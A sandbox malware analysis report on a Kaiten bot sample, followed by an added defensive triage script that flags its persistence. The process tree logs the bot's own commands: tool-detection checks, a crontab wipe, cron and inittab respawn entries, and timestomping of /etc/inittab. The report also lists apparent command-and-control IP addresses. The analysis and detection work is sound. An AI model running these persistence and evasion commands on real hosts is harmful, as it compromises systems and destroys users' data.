Malware Analysis Report

2024-11-13 17:34

Sample ID 220314-c21yescbd5
Target 582a434ba0f2e04bd8b5495c50320068
SHA256 7d3855bb09f2f6111d6c71e06e1e6b06dd47b1dade49af0235b220966c2f5be3
Tags
kaiten persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7d3855bb09f2f6111d6c71e06e1e6b06dd47b1dade49af0235b220966c2f5be3

Threat Level: Known bad

The file 582a434ba0f2e04bd8b5495c50320068 was found to be: Known bad.

Malicious Activity Summary

kaiten persistence

Identified Kaiten Bot

Kaiten family

Writes file to system bin folder

Modifies rc script

Writes file to user bin folder

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-14 02:35

Signatures

Identified Kaiten Bot

Description Indicator Process Target
N/A N/A N/A N/A

Kaiten family

kaiten

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-14 02:35

Reported

2022-03-14 02:37

Platform

ubuntu1804-amd64-en-20211208

Max time kernel

0s

Max time network

102s

Command Line

[./582a434ba0f2e04bd8b5495c50320068]

Signatures

Writes file to system bin folder

Description   Indicator     Process  Target
/bin/crontab  /bin/crontab  N/A      N/A
/bin/nvram    /bin/nvram    N/A      N/A
/bin/uname    /bin/uname    N/A      N/A

Modifies rc script

persistence
Description    Indicator      Process                             Target
/etc/rc.local  /etc/rc.local  ./582a434ba0f2e04bd8b5495c50320068  N/A

Writes file to user bin folder

Description       Indicator         Process  Target
/usr/bin/crontab  /usr/bin/crontab  N/A      N/A
/usr/sbin/nvram   /usr/sbin/nvram   N/A      N/A

Reads runtime system information

Description        Indicator          Process  Target
/proc/filesystems  /proc/filesystems  /bin/cp  N/A
/proc/filesystems  /proc/filesystems  /bin/cp  N/A
/proc/filesystems  /proc/filesystems  /bin/cp  N/A
/proc/filesystems  /proc/filesystems  /bin/cp  N/A

Writes file to tmp directory

Description                            Indicator                              Process                             Target
/tmp/582a434ba0f2e04bd8b5495c50320068  /tmp/582a434ba0f2e04bd8b5495c50320068  /bin/cp                             N/A
/tmp/582a434ba0f2e04bd8b5495c50320068  /tmp/582a434ba0f2e04bd8b5495c50320068  /bin/cp                             N/A
/tmp/582a434ba0f2e04bd8b5495c50320068  /tmp/582a434ba0f2e04bd8b5495c50320068  /bin/cp                             N/A
/tmp/582a434ba0f2e04bd8b5495c50320068  /tmp/582a434ba0f2e04bd8b5495c50320068  /bin/cp                             N/A
/tmp/.bawtz                            /tmp/.bawtz                            ./582a434ba0f2e04bd8b5495c50320068  N/A

Processes

Process                             Command line
./582a434ba0f2e04bd8b5495c50320068  [./582a434ba0f2e04bd8b5495c50320068]
/bin/sh             [sh -c pidof -x strace > /dev/null]
/bin/pidof          [pidof -x strace]
/bin/sh             [sh -c pidof -x tcpdump > /dev/null]
/bin/pidof          [pidof -x tcpdump]
/bin/sh             [sh -c cat /etc/inittab | grep -v "/tmp/582a434ba0f2e04bd8b5495c50320068" > /etc/inittab2]
/bin/sh             [sh -c crontab -l | grep /tmp/582a434ba0f2e04bd8b5495c50320068 | grep -v "no cron" || (crontab -l ; echo "* * * * * /tmp/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &") | crontab -]
/bin/sh             [sh -c crontab -r]
/bin/cat            [cat /etc/inittab]
/bin/grep           [grep -v /tmp/582a434ba0f2e04bd8b5495c50320068]
/usr/bin/crontab    [crontab -r]
/usr/bin/crontab    [crontab -l]
/bin/grep           [grep /tmp/582a434ba0f2e04bd8b5495c50320068]
/bin/grep           [grep -v no cron]
/bin/sh             [sh -c echo "0:2345:respawn:/tmp/582a434ba0f2e04bd8b5495c50320068" >> /etc/inittab2]
/bin/sh             [sh -c cat /etc/inittab2 > /etc/inittab]
/usr/bin/crontab    [crontab -]
/bin/cat            [cat /etc/inittab2]
/usr/bin/crontab    [crontab -l]
/bin/sh             [sh -c rm -rf /etc/inittab2]
/bin/rm             [rm -rf /etc/inittab2]
/bin/sh             [sh -c touch -acmr /bin/ls /etc/inittab]
/usr/bin/touch      [touch -acmr /bin/ls /etc/inittab]
/bin/sh             [sh -c /bin/uname -n]
/bin/sh             [sh -c cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /dev/shm/582a434ba0f2e04bd8b5495c50320068]
/bin/cp             [cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /dev/shm/582a434ba0f2e04bd8b5495c50320068]
/bin/uname          [/bin/uname -n]
/bin/sh             [sh -c cat /etc/inittab | grep -v "/dev/shm/582a434ba0f2e04bd8b5495c50320068" > /etc/inittab2]
/bin/sh             [sh -c crontab -l | grep /dev/shm/582a434ba0f2e04bd8b5495c50320068 | grep -v "no cron" || (crontab -l ; echo "* * * * * /dev/shm/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &") | crontab -]
/bin/cat            [cat /etc/inittab]
/bin/grep           [grep /dev/shm/582a434ba0f2e04bd8b5495c50320068]
/usr/bin/crontab    [crontab -l]
/bin/grep           [grep -v /dev/shm/582a434ba0f2e04bd8b5495c50320068]
/bin/grep           [grep -v no cron]
/bin/sh             [sh -c echo "0:2345:respawn:/dev/shm/582a434ba0f2e04bd8b5495c50320068" >> /etc/inittab2]
/bin/sh             [sh -c cat /etc/inittab2 > /etc/inittab]
/usr/bin/crontab    [crontab -]
/bin/cat            [cat /etc/inittab2]
/usr/bin/crontab    [crontab -l]
/bin/sh             [sh -c rm -rf /etc/inittab2]
/bin/rm             [rm -rf /etc/inittab2]
/bin/sh             [sh -c touch -acmr /bin/ls /etc/inittab]
/usr/bin/touch      [touch -acmr /bin/ls /etc/inittab]
/bin/sh             [sh -c cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/tmp/582a434ba0f2e04bd8b5495c50320068]
/bin/cp             [cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/tmp/582a434ba0f2e04bd8b5495c50320068]
/bin/sh             [sh -c cat /etc/inittab | grep -v "/var/tmp/582a434ba0f2e04bd8b5495c50320068" > /etc/inittab2]
/bin/sh             [sh -c crontab -l | grep /var/tmp/582a434ba0f2e04bd8b5495c50320068 | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/tmp/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &") | crontab -]
/bin/cat            [cat /etc/inittab]
/bin/grep           [grep -v /var/tmp/582a434ba0f2e04bd8b5495c50320068]
/usr/bin/crontab    [crontab -l]
/bin/grep           [grep /var/tmp/582a434ba0f2e04bd8b5495c50320068]
/bin/sh             [sh -c echo "0:2345:respawn:/var/tmp/582a434ba0f2e04bd8b5495c50320068" >> /etc/inittab2]
/bin/grep           [grep -v no cron]
/bin/sh             [sh -c cat /etc/inittab2 > /etc/inittab]
/usr/bin/crontab    [crontab -]
/usr/bin/crontab    [crontab -l]
/bin/cat            [cat /etc/inittab2]
/bin/sh             [sh -c rm -rf /etc/inittab2]
/bin/rm             [rm -rf /etc/inittab2]
/bin/sh             [sh -c touch -acmr /bin/ls /etc/inittab]
/usr/bin/touch      [touch -acmr /bin/ls /etc/inittab]
/bin/sh             [sh -c cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/lock/582a434ba0f2e04bd8b5495c50320068]
/bin/cp             [cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/lock/582a434ba0f2e04bd8b5495c50320068]
/bin/sh             [sh -c cat /etc/inittab | grep -v "/var/lock/582a434ba0f2e04bd8b5495c50320068" > /etc/inittab2]
/bin/sh             [sh -c crontab -l | grep /var/lock/582a434ba0f2e04bd8b5495c50320068 | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/lock/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &") | crontab -]
/bin/cat            [cat /etc/inittab]
/bin/grep           [grep -v /var/lock/582a434ba0f2e04bd8b5495c50320068]
/usr/bin/crontab    [crontab -l]
/bin/grep           [grep /var/lock/582a434ba0f2e04bd8b5495c50320068]
/bin/sh             [sh -c echo "0:2345:respawn:/var/lock/582a434ba0f2e04bd8b5495c50320068" >> /etc/inittab2]
/bin/grep           [grep -v no cron]
/bin/sh             [sh -c cat /etc/inittab2 > /etc/inittab]
/usr/bin/crontab    [crontab -]
/usr/bin/crontab    [crontab -l]
/bin/cat            [cat /etc/inittab2]
/bin/sh             [sh -c rm -rf /etc/inittab2]
/bin/rm             [rm -rf /etc/inittab2]
/bin/sh             [sh -c touch -acmr /bin/ls /etc/inittab]
/usr/bin/touch      [touch -acmr /bin/ls /etc/inittab]
/bin/sh             [sh -c cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/run/582a434ba0f2e04bd8b5495c50320068]
/bin/cp             [cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/run/582a434ba0f2e04bd8b5495c50320068]
/bin/sh             [sh -c cat /etc/inittab | grep -v "/var/run/582a434ba0f2e04bd8b5495c50320068" > /etc/inittab2]
/bin/sh             [sh -c crontab -l | grep /var/run/582a434ba0f2e04bd8b5495c50320068 | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/run/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &") | crontab -]
/usr/bin/crontab    [crontab -l]
/bin/cat            [cat /etc/inittab]
/bin/grep           [grep -v /var/run/582a434ba0f2e04bd8b5495c50320068]
/bin/grep           [grep /var/run/582a434ba0f2e04bd8b5495c50320068]
/bin/grep           [grep -v no cron]
/bin/sh             [sh -c echo "0:2345:respawn:/var/run/582a434ba0f2e04bd8b5495c50320068" >> /etc/inittab2]
/usr/bin/crontab    [crontab -]
/bin/sh             [sh -c cat /etc/inittab2 > /etc/inittab]
/usr/bin/crontab    [crontab -l]
/bin/cat            [cat /etc/inittab2]
/bin/sh             [sh -c rm -rf /etc/inittab2]
/bin/rm             [rm -rf /etc/inittab2]
/bin/sh             [sh -c touch -acmr /bin/ls /etc/inittab]
/usr/bin/touch      [touch -acmr /bin/ls /etc/inittab]
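Reading the process tree as a script: the bot first checks whether strace or tcpdump is running (`pidof -x strace`, `pidof -x tcpdump`), then runs the same persistence routine five times, once for each staging directory it copies itself into (/tmp, /dev/shm, /var/tmp, /var/lock, /var/run). Each pass strips any earlier reference to that path from /etc/inittab via the scratch file /etc/inittab2, appends a `0:2345:respawn:<path>` entry, adds a `* * * * * <path>` line to the user crontab unless one is already there (the first pass also runs `crontab -r`, wiping whatever crontab the user had), deletes /etc/inittab2, and finally runs `touch -acmr /bin/ls /etc/inittab` so the rewritten inittab carries the access and modification times of /bin/ls rather than the time of the infection. The triage script below is an added example, not part of this sandbox report or of the sample: it filters a user crontab, /etc/inittab and /etc/rc.local for entries that launch an executable out of those staging directories, and compares mtimes to catch the timestomp. The sample crontab, inittab and rc.local contents are constructed for the demo, and the staging-directory regex, the function names and the `--live` flag are the example's own choices, not anything the report shows.

```shell
#!/bin/sh
# Added triage helper for the persistence seen in the process tree above.
# Not part of the sandbox report or the sample: flags cron, inittab and
# rc.local entries that launch executables from the staging directories the
# bot copies itself into, and detects the `touch -acmr /bin/ls /etc/inittab`
# timestomp by comparing mtimes.

# Staging directories taken from the cp commands above (all five are used).
DROP_RE='(/tmp|/dev/shm|/var/tmp|/var/lock|/var/run)/'

# Constructed sample inputs (not captured from the detonation), each with a
# benign entry so the filters can be seen to leave legitimate lines alone.
SAMPLE_CRONTAB='# m h dom mon dow command
SHELL=/bin/sh
0 3 * * * /usr/local/bin/backup.sh
* * * * * /tmp/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &
@reboot /dev/shm/582a434ba0f2e04bd8b5495c50320068'

SAMPLE_INITTAB='id:2:initdefault:
si::sysinit:/etc/init.d/rcS
1:2345:respawn:/sbin/getty 38400 tty1
0:2345:respawn:/tmp/582a434ba0f2e04bd8b5495c50320068
0:2345:respawn:/var/run/582a434ba0f2e04bd8b5495c50320068'

SAMPLE_RC_LOCAL='#!/bin/sh -e
# rc.local
/var/tmp/582a434ba0f2e04bd8b5495c50320068 &
exit 0'

# User crontab text (crontab -l format) on stdin -> lines whose command
# starts in a staging directory. Covers the five-field form the bot writes
# and @reboot-style entries; skips comments and NAME=value lines.
# System crontabs (/etc/crontab, /etc/cron.d) carry a user field, so there
# the command is field 7, not 6.
suspicious_cron_lines() {
  awk -v re="^$DROP_RE" '
    /^[ \t]*#/ || /^[A-Za-z_][A-Za-z0-9_]*=/ { next }
    { cmd = ($1 ~ /^@/) ? $2 : $6 }
    cmd ~ re { print }'
}

# inittab text on stdin -> respawn entries (id:runlevels:action:process)
# whose process lives in a staging directory. The bot appends
# "0:2345:respawn:<path>" so a SysV init restarts it whenever it exits.
suspicious_inittab_lines() {
  awk -F: -v re="^$DROP_RE" '
    $3 == "respawn" { split($4, p, " "); if (p[1] ~ re) print }'
}

# rc.local text on stdin -> non-comment lines that invoke a staging-dir path.
# The report flags /etc/rc.local as modified but shows no command for it,
# so this check is deliberately broader than the cron and inittab ones.
suspicious_rc_lines() {
  awk -v re="(^|[ \t])$DROP_RE" '
    /^[ \t]*#/ { next }
    $0 ~ re { print }'
}

# Seconds-resolution mtime; GNU stat first, BSD stat as fallback.
mtime_of() { stat -c %Y "$1" 2>/dev/null || stat -f %m "$1"; }

# Prints "timestomped" when $2 has exactly the mtime of reference binary $1,
# the footprint of `touch -acmr /bin/ls /etc/inittab`, and "ok" otherwise.
# Live use: timestomp_check /bin/ls /etc/inittab
timestomp_check() {
  if [ "$(mtime_of "$1")" = "$(mtime_of "$2")" ]; then
    echo timestomped
  else
    echo ok
  fi
}

# Demo on the constructed samples.
echo '== crontab ==';  printf '%s\n' "$SAMPLE_CRONTAB"  | suspicious_cron_lines
echo '== inittab ==';  printf '%s\n' "$SAMPLE_INITTAB"  | suspicious_inittab_lines
echo '== rc.local =='; printf '%s\n' "$SAMPLE_RC_LOCAL" | suspicious_rc_lines

# Read-only sweep of the current host when invoked with --live.
if [ "${1:-}" = "--live" ]; then
  crontab -l 2>/dev/null | suspicious_cron_lines
  if [ -r /etc/inittab ]; then
    suspicious_inittab_lines < /etc/inittab
    echo "/etc/inittab vs /bin/ls: $(timestomp_check /bin/ls /etc/inittab)"
  fi
  if [ -r /etc/rc.local ]; then
    suspicious_rc_lines < /etc/rc.local
  fi
fi
```

Two caveats when applying this to the detonation platform. Ubuntu 18.04 boots with systemd, which does not read /etc/inittab, so the respawn entries the bot writes have no effect there and the every-minute crontab line is the part that actually restarts it; the mere presence of an /etc/inittab on a systemd host, especially one whose mtime equals that of /bin/ls, is itself worth treating as an indicator. The mtime comparison is only seconds-precise and only catches the specific trick seen here (copying timestamps from a reference binary); a sample that picks a different reference file would need the comparison run against that file instead.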

Network

Country  Destination          Domain  Proto
NL       67.209.115.148:8080  N/A     tcp
SG       194.59.165.52:8080   N/A     tcp
SG       37.44.244.106:8080   N/A     tcp

Files

N/A